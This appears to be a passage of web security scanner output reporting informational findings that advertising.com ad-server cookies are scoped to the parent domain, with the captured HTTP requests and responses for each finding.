BASE=x7Q9bi23SwnkpMdYS8Ne5ru2BcaVK0Bv+k2PmTntoWJelwznY4jXxpCBEQvy2vvEbS3CqqiFiBEZTN3f2B0eLPd/um1PETsGuYvL8A8d0iDEOliUSEDbOxBFe8Zbf0hn7jp9fCFhyHZGl9Opr8TEX1wZjCzrmH356TZtDQXim3se4vocFHNEzrEdRL7ixf0OXuHQy3nGGuhGrOkUxjdUyksL+9CJaKH!; domain=advertising.com; expires=Sat, 15-Jun-2013 18:37:43 GMT; path=/
ROLL=U6APPjemptEW07uaB4l2FnxkoJDmaLF0BZFCNJJmI4r/kefeO05CNFPBGckTh2ewWp6Dkc9UB0fhTc7MO3Ile9a4XCLZ9d3J03tHf2iG6ypOTQJ!; domain=advertising.com; expires=Sat, 15-Jun-2013 18:37:43 GMT; path=/
28183863=_4dfa4d77,0408212157,768034^994447^1183^0,0_; domain=advertising.com; path=/click

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site=768034/size=728090/u=2/bnum=28183863/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860 HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/728x90/atf?t=1308249461999&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACID=qw280013054845430029; BURL1=tGu1NBKvZTFMIYXH1444q3SyX69B==; A07L=3nk4AeYyv6xVEfe8Z9bY4WiTtx8BJRQVLsUBWYK8PItaPHIY5TRLepQ; GUID=MTMwODIyNzEyNzsxOjE2dDUxa28wOTRrMGt1OjM2NQ; aceRTB=rm%3DSat%2C%2016%20Jul%202011%2017%3A56%3A20%20GMT%7Cam%3DSat%2C%2016%20Jul%202011%2017%3A56%3A20%20GMT%7Cdc%3DSat%2C%2016%20Jul%202011%2017%3A56%3A20%20GMT%7Can%3DSat%2C%2016%20Jul%202011%2017%3A56%3A20%20GMT%7Crub%3DSat%2C%2016%20Jul%202011%2017%3A56%3A20%20GMT%7C; C2=Cxk+NFJwHob0Fn6sIWwJoaMjtKPCC0nBeJpwEg02FYMBdbdBGTwihXgxEwjmGYMBxGeBGTAQvagxEQW4FYMBLppBGTQghXgxEgN5FYMB6ijBGTAmhXgxEAY4FYMBdDmBGTA/yagxEAVZGYMBYimBGTA3WagxEQY4FYMBFGeBGTAxBagxEU1aGYMBbTeBGTQwBagxEYnXGYMBWGoBGTgQvagxEogmGYMBxmpBGTQRgagxE0soGYMB8mpBGHZAmZOiGkZj0jw+NXsbtiGA8Mohk7a+AcsmGSuAEOpRBbLuBoKuGm/smJwokaUwzClALRqRBXaxAMdPGTwrQQwdIachq62ApVmhvTqHIUbNG+G; F1=BIET63EBAAAABAAAAEBAECA; BASE=x7Q9ai23SwnkpMdYS8Ne5ru2BcaVK0Bv+k2PmTntoWJelwznY4jXxpCBEQvy2vvEbS3CqqiFiBEZTN3f2B0eLPd/um1PETsGuYvL8A8d0iDEOliUSEDbOxBFe8Zbf0hn7jp9fCFhyHZGl9Opr8TEX1wZjCzrmH356TZtDQXim3se4vocFHNEzrEdRL7ixf0OXuHQy3nGGuhGrOkUxjdUykM!; ROLL=U6APOjemptEW07uaB4l2FnxkoJDmaLF0BZFCNJJmI4r/kefeO05CNFPBGckTh2ewWp6Dkc9UB0fhTc7MO3Ile9a4XCLZ9d3J03tHf2C!

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.994447.768034.0XMC
Cache-Control: private, max-age=0, no-cache
Expires: Thu, 16 Jun 2011 18:37:43 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 602
Date: Thu, 16 Jun 2011 18:37:43 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: C2=31k+NFJwHob0Fm6sIWwJoaIjtKPCC0nxdJpwEg02FXMBdbdxFTwihXcxEwjmGXMBxGexFTAQvacxEQW4FXMBLppxFTQghXcxEgN5FXMB6ijxFTAmhXcxEAY4FXMBdDmxFTA/yacxEAVZGXMBYimxFTA3WacxEQY4FXMBFGexFTAxBacxEU1aGXMBbTexFTQwBacxEYnXGXMBWGoxFTgQvacxEogmGXMBxmpxFTQRgacxE0soGXMB8mpxFHZAmZOiGjZj0jw+NXobtiGA8MoRk7a+AcsmGRuAEOpBBbLuBoKuGl/smJwokaQwzClALRqBBXaxAMdPGSwrQQwdIaYhq62ApVmRvTqHIUbNG9G; domain=advertising.com; expires=Sat, 15-Jun-2013 18:37:43 GMT; path=/
Set-Cookie: F1=BcXT63EBAAAABAAAAIBACCA; domain=advertising.com; expires=Sat, 15-Jun-2013 18:37:43 GMT; path=/
Set-Cookie: BASE=x7Q9bi23SwnkpMdYS8Ne5ru2BcaVK0Bv+k2PmTntoWJelwznY4jXxpCBEQvy2vvEbS3CqqiFiBEZTN3f2B0eLPd/um1PETsGuYvL8A8d0iDEOliUSEDbOxBFe8Zbf0hn7jp9fCFhyHZGl9Opr8TEX1wZjCzrmH356TZtDQXim3se4vocFHNEzrEdRL7ixf0OXuHQy3nGGuhGrOkUxjdUyksL+9CJaKH!; domain=advertising.com; expires=Sat, 15-Jun-2013 18:37:43 GMT; path=/
Set-Cookie: ROLL=U6APPjemptEW07uaB4l2FnxkoJDmaLF0BZFCNJJmI4r/kefeO05CNFPBGckTh2ewWp6Dkc9UB0fhTc7MO3Ile9a4XCLZ9d3J03tHf2iG6ypOTQJ!; domain=advertising.com; expires=Sat, 15-Jun-2013 18:37:43 GMT; path=/
Set-Cookie: 28183863=_4dfa4d77,0408212157,768034^994447^1183^0,0_; domain=advertising.com; path=/click

document.write('<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N6333.272756.AOL-ADVERTISING/B5305142.3;sz=728x90;click=http://r1-ads.ace.advertising.com/click/site=0000768034/mn
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r1-ads.ace.advertising.com
Path:	/site=768034/size=728090/u=2/bnum=3488355/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

C2=QJl+NFJwHob0Fi6sIWwJoa4itKPCC0nxcJpwEg02FTMBdbdxETwihXMxEwjmGTMBxGexETAQvaMxEQW4FTMBLppxETQghXMxEgN5FTMB6ijxETAmhXMxEAY4FTMBdDmxETA/yaMxEAVZGTMBYimxETA3WaMxEQY4FTMBFGexETAxBaMxEU1aGTMBbTexETQwBaMxEYnXGTMBWGoxETgQvaMxEogmGTMBxmpxETQRgaMxE0soGTMB8mpxEHZAmZOiGfZj0jw+NXYbtiGA8MoRj7a+AcsmGNuAEOpBAbLuBoKuGh/smJwokaAwzClALRqBAXaxAMdPGOwrQQwdIaIhq62ApVmRuTqHIUbNG5WtrCQIza0IwOICM/ohvdr0IwKvG/G; domain=advertising.com; expires=Sat, 15-Jun-2013 18:58:24 GMT; path=/
F1=BAlU63EBAAAABAAAAcBA6BA; domain=advertising.com; expires=Sat, 15-Jun-2013 18:58:24 GMT; path=/
BASE=x7Q9gi23SwnkpMdYS8Ne5ru2BcaVK0Bv+k2PmTntoWJelwznY4jXxpCBEQvy2vvEbS3CqqiFiBEZTN3f2B0eLPd/um1PETsGuYvL8A8d0iDEOliUSEDbOxBFe8Zbf0hn7jp9fCFhyHZGl9Opr8TEX1wZjCzrmH356TZtDQXim3se4vocFHNEzrEdRL7ixf0OXuHQy3nGGuhGrOkUxjdUyksh8ICJaK3qk5Kdse5YdLmQk/tY7KQgKe5GmLixINBY7uyr5mJ!; domain=advertising.com; expires=Sat, 15-Jun-2013 18:58:24 GMT; path=/
ROLL=U6APQjemptEW07uaB4l2FnxkoJDmaLF0BZFCNJJmI4r/kefeO05CNFPBGckTh2ewWp6Dkc9UB0fhTc7MO3Ile9a4XCLZ9d3J03tHf2is4HpOTQpM6s5GotpW7CQ8JMfjkHZFUlOy7ezWe0kEmjAGnCD!; domain=advertising.com; expires=Sat, 15-Jun-2013 18:58:24 GMT; path=/
3488355=_4dfa5250,1828847536,768034^1008685^1183^0,0_; domain=advertising.com; path=/click

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site=768034/size=728090/u=2/bnum=3488355/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860 HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/728x90/atf?t=1308250703177&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACID=qw280013054845430029; BURL1=tGu1NBKvZTFMIYXH1444q3SyX69B==; A07L=3nk4AeYyv6xVEfe8Z9bY4WiTtx8BJRQVLsUBWYK8PItaPHIY5TRLepQ; GUID=MTMwODIyNzEyNzsxOjE2dDUxa28wOTRrMGt1OjM2NQ; aceRTB=rm%3DSat%2C%2016%20Jul%202011%2017%3A56%3A20%20GMT%7Cam%3DSat%2C%2016%20Jul%202011%2017%3A56%3A20%20GMT%7Cdc%3DSat%2C%2016%20Jul%202011%2017%3A56%3A20%20GMT%7Can%3DSat%2C%2016%20Jul%202011%2017%3A56%3A20%20GMT%7Crub%3DSat%2C%2016%20Jul%202011%2017%3A56%3A20%20GMT%7C; C2=aEl+NFJwHob0Fj6sIWwJoa8itKPCC0nBdJpwEg02FUMBdbdBFTwihXQxEwjmGUMBxGeBFTAQvaQxEQW4FUMBLppBFTQghXQxEgN5FUMB6ijBFTAmhXQxEAY4FUMBdDmBFTA/yaQxEAVZGUMBYimBFTA3WaQxEQY4FUMBFGeBFTAxBaQxEU1aGUMBbTeBFTQwBaQxEYnXGUMBWGoBFTgQvaQxEogmGUMBxmpBFTQRgaQxE0soGUMB8mpBFHZAmZOiGgZj0jw+NXcbtiGA8Mohj7a+AcsmGOuAEOpRAbLuBoKuGi/smJwokaEwzClALRqRAXaxAMdPGPwrQQwdIaMhq62ApVmhuTqHIUbNG6WtrCQIza4IwOICM/oxvdr0IwKvGAH; F1=BoRU63EBAAAABAAAAYBA8BA; BASE=x7Q9fi23SwnkpMdYS8Ne5ru2BcaVK0Bv+k2PmTntoWJelwznY4jXxpCBEQvy2vvEbS3CqqiFiBEZTN3f2B0eLPd/um1PETsGuYvL8A8d0iDEOliUSEDbOxBFe8Zbf0hn7jp9fCFhyHZGl9Opr8TEX1wZjCzrmH356TZtDQXim3se4vocFHNEzrEdRL7ixf0OXuHQy3nGGuhGrOkUxjdUyksh8ICJaK3qk5Kdse5YdLmQk/tY7KQgKe5GmLixINB!; ROLL=U6APTjemptEW07uaB4l2FnxkoJDmaLF0BZFCNJJmI4r/kefeO05CNFPBGckTh2ewWp6Dkc9UB0fhTc7MO3Ile9a4XCLZ9d3J03tHf2is4HpOTQpM6s5GotpW7CQ8JMfjkHZFUlOy7ezWe0E!

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.1008685.768034.0XMC
Cache-Control: private, max-age=0, no-cache
Expires: Thu, 16 Jun 2011 18:58:24 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 594
Vary: Accept-Encoding
Date: Thu, 16 Jun 2011 18:58:24 GMT
Connection: close
Set-Cookie: C2=QJl+NFJwHob0Fi6sIWwJoa4itKPCC0nxcJpwEg02FTMBdbdxETwihXMxEwjmGTMBxGexETAQvaMxEQW4FTMBLppxETQghXMxEgN5FTMB6ijxETAmhXMxEAY4FTMBdDmxETA/yaMxEAVZGTMBYimxETA3WaMxEQY4FTMBFGexETAxBaMxEU1aGTMBbTexETQwBaMxEYnXGTMBWGoxETgQvaMxEogmGTMBxmpxETQRgaMxE0soGTMB8mpxEHZAmZOiGfZj0jw+NXYbtiGA8MoRj7a+AcsmGNuAEOpBAbLuBoKuGh/smJwokaAwzClALRqBAXaxAMdPGOwrQQwdIaIhq62ApVmRuTqHIUbNG5WtrCQIza0IwOICM/ohvdr0IwKvG/G; domain=advertising.com; expires=Sat, 15-Jun-2013 18:58:24 GMT; path=/
Set-Cookie: F1=BAlU63EBAAAABAAAAcBA6BA; domain=advertising.com; expires=Sat, 15-Jun-2013 18:58:24 GMT; path=/
Set-Cookie: BASE=x7Q9gi23SwnkpMdYS8Ne5ru2BcaVK0Bv+k2PmTntoWJelwznY4jXxpCBEQvy2vvEbS3CqqiFiBEZTN3f2B0eLPd/um1PETsGuYvL8A8d0iDEOliUSEDbOxBFe8Zbf0hn7jp9fCFhyHZGl9Opr8TEX1wZjCzrmH356TZtDQXim3se4vocFHNEzrEdRL7ixf0OXuHQy3nGGuhGrOkUxjdUyksh8ICJaK3qk5Kdse5YdLmQk/tY7KQgKe5GmLixINBY7uyr5mJ!; domain=advertising.com; expires=Sat, 15-Jun-2013 18:58:24 GMT; path=/
Set-Cookie: ROLL=U6APQjemptEW07uaB4l2FnxkoJDmaLF0BZFCNJJmI4r/kefeO05CNFPBGckTh2ewWp6Dkc9UB0fhTc7MO3Ile9a4XCLZ9d3J03tHf2is4HpOTQpM6s5GotpW7CQ8JMfjkHZFUlOy7ezWe0kEmjAGnCD!; domain=advertising.com; expires=Sat, 15-Jun-2013 18:58:24 GMT; path=/
Set-Cookie: 3488355=_4dfa5250,1828847536,768034^1008685^1183^0,0_; domain=advertising.com; path=/click

document.write('<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N4190.advertising.com/B5416523.2;sz=728x90;click=http://r1-ads.ace.advertising.com/click/site=0000768034/mnum=0001
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r1-ads.ace.advertising.com
Path:	/site=768034/size=728090/u=2/bnum=42950117/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

C2=k/k+NFJwHob0Fk6sIWwJoaAjtKPCC0nRdJpwEg02FVMBdbdRFTwihXUxEwjmGVMBxGeRFTAQvaUxEQW4FVMBLppRFTQghXUxEgN5FVMB6ijRFTAmhXUxEAY4FVMBdDmRFTA/yaUxEAVZGVMBYimRFTA3WaUxEQY4FVMBFGeRFTAxBaUxEU1aGVMBbTeRFTQwBaUxEYnXGVMBWGoRFTgQvaUxEogmGVMBxmpRFTQRgaUxE0soGVMB8mpRFHZAmZOiGhZj0jw+NXgbtiGA8Moxj7a+AcsmGPuAEOphAbLuBoKuGj/smJwokaIwzClALRqhAXaxAMdPGQwrQQwdIaQhq62ApVmxuTqHIUbNG7WtrCQIza8I; domain=advertising.com; expires=Sat, 15-Jun-2013 18:48:04 GMT; path=/
F1=BQ+T63EBAAAABAAAAQBA+BA; domain=advertising.com; expires=Sat, 15-Jun-2013 18:48:04 GMT; path=/
BASE=x7Q9di23SwnkpMdYS8Ne5ru2BcaVK0Bv+k2PmTntoWJelwznY4jXxpCBEQvy2vvEbS3CqqiFiBEZTN3f2B0eLPd/um1PETsGuYvL8A8d0iDEOliUSEDbOxBFe8Zbf0hn7jp9fCFhyHZGl9Opr8TEX1wZjCzrmH356TZtDQXim3se4vocFHNEzrEdRL7ixf0OXuHQy3nGGuhGrOkUxjdUyksh8ICJaK3qk5Kdse5CKYmQk/N!; domain=advertising.com; expires=Sat, 15-Jun-2013 18:48:04 GMT; path=/
ROLL=U6APNjemptEW07uaB4l2FnxkoJDmaLF0BZFCNJJmI4r/kefeO05CNFPBGckTh2ewWp6Dkc9UB0fhTc7MO3Ile9a4XCLZ9d3J03tHf2is4HpOTQpM6s5GotpMsRQ8JMP!; domain=advertising.com; expires=Sat, 15-Jun-2013 18:48:04 GMT; path=/
42950117=_4dfa4fe4,2035415743,768034^994447^1183^0,0_; domain=advertising.com; path=/click

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site=768034/size=728090/u=2/bnum=42950117/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860 HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/728x90/atf?t=1308250082418&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACID=qw280013054845430029; BURL1=tGu1NBKvZTFMIYXH1444q3SyX69B==; A07L=3nk4AeYyv6xVEfe8Z9bY4WiTtx8BJRQVLsUBWYK8PItaPHIY5TRLepQ; GUID=MTMwODIyNzEyNzsxOjE2dDUxa28wOTRrMGt1OjM2NQ; aceRTB=rm%3DSat%2C%2016%20Jul%202011%2017%3A56%3A20%20GMT%7Cam%3DSat%2C%2016%20Jul%202011%2017%3A56%3A20%20GMT%7Cdc%3DSat%2C%2016%20Jul%202011%2017%3A56%3A20%20GMT%7Can%3DSat%2C%2016%20Jul%202011%2017%3A56%3A20%20GMT%7Crub%3DSat%2C%2016%20Jul%202011%2017%3A56%3A20%20GMT%7C; C2=u6k+NFJwHob0Fl6sIWwJoaEjtKPCC0nhdJpwEg02FWMBdbdhFTwihXYxEwjmGWMBxGehFTAQvaYxEQW4FWMBLpphFTQghXYxEgN5FWMB6ijhFTAmhXYxEAY4FWMBdDmhFTA/yaYxEAVZGWMBYimhFTA3WaYxEQY4FWMBFGehFTAxBaYxEU1aGWMBbTehFTQwBaYxEYnXGWMBWGohFTgQvaYxEogmGWMBxmphFTQRgaYxE0soGWMB8mphFHZAmZOiGiZj0jw+NXkbtiGA8MoBk7a+AcsmGQuAEOpxAbLuBoKuGk/smJwokaMwzClALRqxAXaxAMdPGRwrQQwdIaUhq62ApVmBvTqHIUbNG8WtrCQIzaAJ; F1=B4qT63EBAAAABAAAAMBAACA; BASE=x7Q9ci23SwnkpMdYS8Ne5ru2BcaVK0Bv+k2PmTntoWJelwznY4jXxpCBEQvy2vvEbS3CqqiFiBEZTN3f2B0eLPd/um1PETsGuYvL8A8d0iDEOliUSEDbOxBFe8Zbf0hn7jp9fCFhyHZGl9Opr8TEX1wZjCzrmH356TZtDQXim3se4vocFHNEzrEdRL7ixf0OXuHQy3nGGuhGrOkUxjdUyksh8ICJaK3qk5KdseJ!; ROLL=U6APMjemptEW07uaB4l2FnxkoJDmaLF0BZFCNJJmI4r/kefeO05CNFPBGckTh2ewWp6Dkc9UB0fhTc7MO3Ile9a4XCLZ9d3J03tHf2is4HpOTQpM6s5GotJ!

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.994447.768034.0XMC
Cache-Control: private, max-age=0, no-cache
Expires: Thu, 16 Jun 2011 18:48:04 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 602
Date: Thu, 16 Jun 2011 18:48:04 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: C2=k/k+NFJwHob0Fk6sIWwJoaAjtKPCC0nRdJpwEg02FVMBdbdRFTwihXUxEwjmGVMBxGeRFTAQvaUxEQW4FVMBLppRFTQghXUxEgN5FVMB6ijRFTAmhXUxEAY4FVMBdDmRFTA/yaUxEAVZGVMBYimRFTA3WaUxEQY4FVMBFGeRFTAxBaUxEU1aGVMBbTeRFTQwBaUxEYnXGVMBWGoRFTgQvaUxEogmGVMBxmpRFTQRgaUxE0soGVMB8mpRFHZAmZOiGhZj0jw+NXgbtiGA8Moxj7a+AcsmGPuAEOphAbLuBoKuGj/smJwokaIwzClALRqhAXaxAMdPGQwrQQwdIaQhq62ApVmxuTqHIUbNG7WtrCQIza8I; domain=advertising.com; expires=Sat, 15-Jun-2013 18:48:04 GMT; path=/
Set-Cookie: F1=BQ+T63EBAAAABAAAAQBA+BA; domain=advertising.com; expires=Sat, 15-Jun-2013 18:48:04 GMT; path=/
Set-Cookie: BASE=x7Q9di23SwnkpMdYS8Ne5ru2BcaVK0Bv+k2PmTntoWJelwznY4jXxpCBEQvy2vvEbS3CqqiFiBEZTN3f2B0eLPd/um1PETsGuYvL8A8d0iDEOliUSEDbOxBFe8Zbf0hn7jp9fCFhyHZGl9Opr8TEX1wZjCzrmH356TZtDQXim3se4vocFHNEzrEdRL7ixf0OXuHQy3nGGuhGrOkUxjdUyksh8ICJaK3qk5Kdse5CKYmQk/N!; domain=advertising.com; expires=Sat, 15-Jun-2013 18:48:04 GMT; path=/
Set-Cookie: ROLL=U6APNjemptEW07uaB4l2FnxkoJDmaLF0BZFCNJJmI4r/kefeO05CNFPBGckTh2ewWp6Dkc9UB0fhTc7MO3Ile9a4XCLZ9d3J03tHf2is4HpOTQpM6s5GotpMsRQ8JMP!; domain=advertising.com; expires=Sat, 15-Jun-2013 18:48:04 GMT; path=/
Set-Cookie: 42950117=_4dfa4fe4,2035415743,768034^994447^1183^0,0_; domain=advertising.com; path=/click

document.write('<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N6333.272756.AOL-ADVERTISING/B5305142.3;sz=728x90;click=http://r1-ads.ace.advertising.com/click/site=0000768034/mn
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r1-ads.ace.advertising.com
Path:	/site=768034/size=728090/u=2/bnum=45425146/hr=14/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

C2=2cl+NFJwHob0Fe6sIWwJoaoitKPCC0nxbJpwEg02FPMBdbdxDTwihX8wEwjmGPMBxGexDTAQva8wEQW4FPMBLppxDTQghX8wEgN5FPMB6ijxDTAmhX8wEAY4FPMBdDmxDTA/ya8wEAVZGPMBYimxDTA3Wa8wEQY4FPMBFGexDTAxBa8wEU1aGPMBbTexDTQwBa8wEYnXGPMBWGoxDTgQva8wEogmGPMBxmpxDTQRga8wE0soGPMB8mpxDHZAmZOiGbZj0jw+NXIbtiGA8MoRi7a+AcsmGJuAEOpB/aLuBoKuGd/smJwokawvzClALRqB/WaxAMdPGKwrQQwdIa4gq62ApVmRtTqHIUbNG1WtrCQIzakIwOICM/ohudr0IwKvGAHt5jwMva8b; domain=advertising.com; expires=Sat, 15-Jun-2013 19:19:18 GMT; path=/
F1=BYzV63EBAAAABAAAA0BAyBA; domain=advertising.com; expires=Sat, 15-Jun-2013 19:19:18 GMT; path=/
BASE=x7Q9mi23SwnkpMdYS8Ne5ru2BcaVK0Bv+k2PmTntoWJelwznY4jXxpCBEQvy2vvEbS3CqqiFiBEZTN3f2B0eLPd/um1PETsGuYvL8A8d0iDEOliUSEDbOxBFe8Zbf0hn7jp9fCFhyHZGl9Opr8TEX1wZjCzrmH356TZtDQXim3se4vocFHNEzrEdRL7ixf0OXuHQy3nGGuhGrOkUxjdUyksh8ICJaK3qk5Kdse5YdLmQk/tY7KQgKe5GmLixINBY7uyr5mZqiQCHOlSr37nk7zuuytsX+/PNnXEVdwPGnvMOKD7oROzNVhK!; domain=advertising.com; expires=Sat, 15-Jun-2013 19:19:18 GMT; path=/
ROLL=U6APajemptEW07uaB4l2FnxkoJDmaLF0BZFCNJJmI4r/kefeO05CNFPBGckTh2ewWp6Dkc9UB0fhTc7MO3Ile9a4XCLZ9d3J03tHf2is4HpOTQpM6s5GotpW7CQ8JMfjkHZFUlOy7ezWe0kEmjAGnCzv+jvvGKndKOIZB/g+cLdnWpK7KosVuHGAs5By7Nea54Ml6iN!; domain=advertising.com; expires=Sat, 15-Jun-2013 19:19:18 GMT; path=/
45425146=_4dfa5736,5745513245,768034^1029516^1183^0,0_; domain=advertising.com; path=/click

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site=768034/size=728090/u=2/bnum=45425146/hr=14/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860 HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/728x90/atf?t=1308251956696&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACID=qw280013054845430029; BURL1=tGu1NBKvZTFMIYXH1444q3SyX69B==; A07L=3nk4AeYyv6xVEfe8Z9bY4WiTtx8BJRQVLsUBWYK8PItaPHIY5TRLepQ; GUID=MTMwODIyNzEyNzsxOjE2dDUxa28wOTRrMGt1OjM2NQ; aceRTB=rm%3DSat%2C%2016%20Jul%202011%2017%3A56%3A20%20GMT%7Cam%3DSat%2C%2016%20Jul%202011%2017%3A56%3A20%20GMT%7Cdc%3DSat%2C%2016%20Jul%202011%2017%3A56%3A20%20GMT%7Can%3DSat%2C%2016%20Jul%202011%2017%3A56%3A20%20GMT%7Crub%3DSat%2C%2016%20Jul%202011%2017%3A56%3A20%20GMT%7C; C2=+Xl+NFJwHob0Ff6sIWwJoasitKPCC0nBcJpwEg02FQMBdbdBETwihXAxEwjmGQMBxGeBETAQvaAxEQW4FQMBLppBETQghXAxEgN5FQMB6ijBETAmhXAxEAY4FQMBdDmBETA/yaAxEAVZGQMBYimBETA3WaAxEQY4FQMBFGeBETAxBaAxEU1aGQMBbTeBETQwBaAxEYnXGQMBWGoBETgQvaAxEogmGQMBxmpBETQRgaAxE0soGQMB8mpBEHZAmZOiGcZj0jw+NXMbtiGA8Mohi7a+AcsmGKuAEOpR/aLuBoKuGe/smJwoka0vzClALRqR/WaxAMdPGLwrQQwdIa8gq62ApVmhtTqHIUbNG2WtrCQIzaoIwOICM/oxudr0IwKvG8Gt5jwMvaAc; F1=B4fV63EBAAAABAAAAwBA0BA; BASE=x7Q9li23SwnkpMdYS8Ne5ru2BcaVK0Bv+k2PmTntoWJelwznY4jXxpCBEQvy2vvEbS3CqqiFiBEZTN3f2B0eLPd/um1PETsGuYvL8A8d0iDEOliUSEDbOxBFe8Zbf0hn7jp9fCFhyHZGl9Opr8TEX1wZjCzrmH356TZtDQXim3se4vocFHNEzrEdRL7ixf0OXuHQy3nGGuhGrOkUxjdUyksh8ICJaK3qk5Kdse5YdLmQk/tY7KQgKe5GmLixINBY7uyr5mZqiQCHOlSr37nk7zuuytsX+/PNnXEVdwPGnvMOKDL!; 